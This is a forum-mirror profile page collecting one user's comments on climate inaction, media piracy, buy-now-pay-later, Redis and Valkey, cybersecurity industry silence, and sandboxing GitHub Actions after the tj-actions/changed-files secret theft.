Readit News logoReadit News
cyrnel commented on How does the US use water?   construction-physics.com/... · Posted by u/juliangamble
xyst · 7 days ago
With the rise in climate change and _collective inaction_. We are in a trajectory for mass extinction [1].

With the second AI gold rush coming to a near abrupt stop, political climates worsening, billionaires continuing to loot the collective populace through their pawns in the kakistocracy (USA) and kleptocracy (Russia). We are absolutely cooked.

What’s the point anymore? What are we even solving? Being a _good_ person is no longer worth any value. Just exploit and climb over each other like crabs in barrel.

[1] https://www.washingtonpost.com/climate-environment/2024/09/1...

cyrnel · 7 days ago
It's true that we were all sold the lie of individual actions being the way to solve the climate crisis (recycling, turning off lights, etc.) But I think the conclusion is to try other strategies rather than giving up when the first strategy didn't work.
cyrnel commented on Anna's Archive: An Update from the Team   annas-archive.org/blog/an... · Posted by u/jerheinze
computerdork · 10 days ago
Know am going to be downvoted into oblivion, but as a composer, can see it from the side of creators. Yeah, making their products free is starving these industries. For instance, in music, there is already very little money in music (think about how many musicians you personally know who can make a living off of music, besides being a music teacher). And, the music industry is still not even the same size as it was in 90's - global revenue in 2024 was $29 billion, while in 1994, in was $35 billion (and that's not even taking into account inflation).

Yes, there are many other reason why the music industry fell, but when your main demographic can always go to bittorrent to get their music if prices are too high, then there is only so much you can do with the price of music.

Yeah, I remember the 90's, music was huge, and there were so many good bands (Smashing Pumpkins, Nirvana, REM, White Stripes... Or if you're more into popular music, Michael Jackson, Whitney Houston...). Now, music is de-valued and cheap and our music scene has been decimated. Personally, think we should try to find ways to support musicians, writers, thinkers, artists...

... but if you have a different opinion, no worries. But, if you can, give it thought.

cyrnel · 10 days ago
The ideal situation would be building a society that believes everyone deserves to be fed, clothed, and housed regardless of their ability to make profitable things. Weird how politically unpopular that seems to be.

Both producers and consumers of media are in the same boat of barely surviving. Maybe we can work with each other instead of against each other? :)

cyrnel commented on Demonstrably Secure Software Supply Chains with Nix   nixcademy.com/posts/secur... · Posted by u/todsacerdoti
cyrnel · 4 months ago
This seems to only address a few of the nine threats to the software supply chain, mainly "(D) External build parameters" and maybe the content-addressable storage addresses some of the distribution phase threats: https://slsa.dev/spec/v1.1/threats

There are still many other ways that a dependency can be exploited before or after the build phase.

cyrnel commented on Burrito Now, Pay Later   enterprisevalue.substack.... · Posted by u/gwintrob
cyrnel · 4 months ago
BNPL is only "good" if your definition of "good" is about GDP, market flexibility, high-performance index funds, and other things that have nothing to do with human happiness.

I'll believe that BNPL is good when all the companies become non-profits that use excess funds to cancel debts rather than lining the pockets of rich investors.

cyrnel commented on How to harden GitHub Actions   wiz.io/blog/github-action... · Posted by u/moyer
abhisek · 4 months ago
GitHub Actions by default provide isolated VM with root privilege to a workflow. Don’t think job level privilege isolation is in its threat model currently. Although it does allow job level scopes for the default GitHub token.

Also the secrets are accessible only when a workflow is invoked from trusted trigger ie. not from a forked repo. Not sure what else can be done here to protect against compromised 3rd party action.

cyrnel · 4 months ago
People have been running different levels of privileged code together on the same machine ever since the invention of virtual machines. We have lots of lightweight sandboxing technologies that could be used when invoking a particular action such as tj-actions/changed-files that only gives it the permissions it needs.

You may do a "docker build" in a pipeline which does need root access and network access, but when you publish a package on pypi, you certainly don't need root access and you also don't need access to the entire internet, just the pypi API endpoint(s) necessary for publishing.

cyrnel commented on How to harden GitHub Actions   wiz.io/blog/github-action... · Posted by u/moyer
esafak · 4 months ago
Where can I read about this? I see no reference in its repo: https://github.com/search?q=repo%3Atj-actions%2Fchanged-file...
cyrnel · 4 months ago
Every action gets these permissions by default. The reason we know it had that permission is that the exploit code read from /proc/pid/mem to steal the secrets, which requires some permissions: https://blog.cloudflare.com/diving-into-proc-pid-mem/#access...

Linux processes have tons of default permissions that they don't really need.

cyrnel commented on How to harden GitHub Actions   wiz.io/blog/github-action... · Posted by u/moyer
cyrnel · 4 months ago
This has some good advice, but I can't help but notice that none of this solves a core problem with the tj-actions/changed-files issue: The workflow had the CAP_SYS_PTRACE capability when it didn't need it, and it used that permission to steal secrets from the runner process.

You don't need to audit every line of code in your dependencies and their subdependencies if your dependencies are restricted to only doing the thing they are designed to do and nothing more.

There's essentially nothing nefarious changed-files could do if it were limited to merely reading a git diff provided to it on stdin.

Github provides no mechanism to do this, probably because posts like this one never even call out the glaring omission of a sandboxing feature.

cyrnel commented on Redis is open source again   antirez.com/news/151... · Posted by u/antirez
kiitos · 4 months ago
Statistically nobody is using valkey.
cyrnel · 4 months ago
Amazon really encourages valkey in the elasticache dashboard. There's a banner advertising lower prices and it's listed first in the dropdown when you go to create one. Default settings do have power.
cyrnel commented on Deafening Silence from the Cybersecurity Industry   forbes.com/sites/tonybrad... · Posted by u/rbanffy
cyrnel · 4 months ago
I think this article describes the issue well:

https://crankysec.com/blog/community/

> All the cybersecurity companies saying "We don't have anything to say about this situation." is just them being true to their main in-group: for-profit companies that don't want to upset a big current or potential buyer. They are, first and foremost, part of that "community", and they happen to be involved in cybersecurity. Solidarity is happening there, just not to the people in cybersecurity.

This sucks and we should change it for sure. So many other industries have successfully become professionalized, unionized, and kicked the grifters to the curb. But it feels more and more like the cybersecurity grifters are the ones holding the reins.

u/cyrnel

KarmaCake day384July 1, 2023View Original